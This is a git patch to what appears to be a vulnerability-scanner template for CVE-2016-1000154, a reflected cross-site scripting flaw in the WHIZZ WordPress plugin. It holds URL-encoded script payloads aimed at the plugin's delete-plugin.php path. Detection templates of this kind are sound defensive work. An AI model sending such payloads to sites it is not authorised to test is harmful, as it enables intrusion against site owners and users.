From ae827beadec0717230280107e88230991ae011f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 18:42:11 +0530 Subject: [PATCH] Update CVE-2016-1000154.yaml --- cves/2016/CVE-2016-1000154.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index 7be2a14754..c459fd33e9 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -4,19 +4,20 @@ info: name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word